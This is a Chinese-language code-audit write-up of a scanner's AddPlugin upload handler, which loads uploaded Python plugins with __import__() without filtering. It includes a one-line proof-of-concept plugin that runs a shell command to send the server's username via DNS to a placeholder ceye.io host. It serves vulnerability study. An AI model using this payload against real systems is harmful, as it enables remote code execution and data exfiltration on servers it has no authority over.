文件位置:view/view.py
AddPlugin()
# 新增插件异步 @app.route('/addplugin', methods=['get', 'post']) @logincheck @anticsrf def AddPlugin(): result = 'fail' f = request.files['file'] isupload = request.form.get('isupload', 'false') file_name = '' if f: fname = secure_filename(f.filename) if fname.split('.')[-1] == 'py': path = file_path + fname if os.path.exists(file_path + fname): fname = fname.split('.')[0] + '_' + str(datetime.now().second) + '.py' path = file_path + fname f.save(path) if os.path.exists(path): file_name = fname.split('.')[0] module = __import__(file_name) mark_json = module.get_plugin_info() mark_json['filename'] = file_name mark_json['add_time'] = datetime.now() mark_json['count'] = 0 if 'source' not in mark_json: mark_json['source'] = 0 insert_result = Mongo.coll['Plugin'].insert(mark_json) if insert_result: result = 'success' file_name = file_name +'.py' else: name = request.form.get('name', '') info = request.form.get('info', '') author = request.form.get('author', '') level = request.form.get('level', '') type = request.form.get('vultype', '') keyword = request.form.get('keyword', '') pluginurl = request.form.get('pluginurl', '') methodurl = request.form.get('methodurl', '') pdata = request.form.get('pdata', '') analyzing = request.form.get('analyzing', '') analyzingdata = request.form.get('analyzingdata', '') tag = request.form.get('tag', '') try: query = {'name': name, 'info': info, 'level': level, 'type': type, 'author': author, 'url': pluginurl, 'keyword': keyword, 'source': 0} query['plugin'] = {'method': methodurl.split(' ', 1)[0], 'url': methodurl.split(' ', 1)[1], 'analyzing': analyzing, 'analyzingdata': analyzingdata, 'data': pdata, 'tag': tag} file_name = secure_filename(name) + '_' + str(datetime.now().second) + ".json" with open(file_path + file_name, 'wb') as wt: wt.writelines(json.dumps(query)) query.pop('plugin') query['add_time'] = datetime.now() query['count'] = 0 query['filename'] = file_name insert_result = Mongo.coll['Plugin'].insert(query) if insert_result: result = 'success' except: pass if isupload == 'true' and result == 'success': code_tuple = open(file_path+file_name).read() code = '' for _ in code_tuple: code += _ params = {'code': code} req = urllib2.Request('https://sec.ly.com/xunfeng/pluginupload') req.add_header('Content-Type','application/x-www-form-urlencoded') rsp = urllib2.urlopen(req,urlencode(params)) print 'upload result:' + rsp.read() return result
先判断插件格式是json还是上传python文件
329-348行
python文件:利用secure_filename()函数来处理文件名。secure_filename()函数只返回ASCII字符,非ASCII字符会被过滤掉。判断是否py结尾, 文件是否存在,如果存在就重新命名。然后保存。
然后用__import__()加载这个文件, 获取到里面的get_plugin_info()的信息。我们编写插件的格式要有get_plugin_info()这个方法,返回插件信息。然后再加入了文件名 时间。保存到数据库。
由于使用了__import__() 可以动态加载文件,也没过滤。所以可以构造个代码执行,利用dnslog验证下。
import os; def get_plugin_info(): os.system("ping `whoami`.ip.port.xxx.ceye.io");
成功
351-379行
如果是json格式就接收传来的参数,然后插入到数据库里,并且写入到.json里文件里。
380-389行
如果有共享上传并且成功了,就向ysrc也发送一份poc...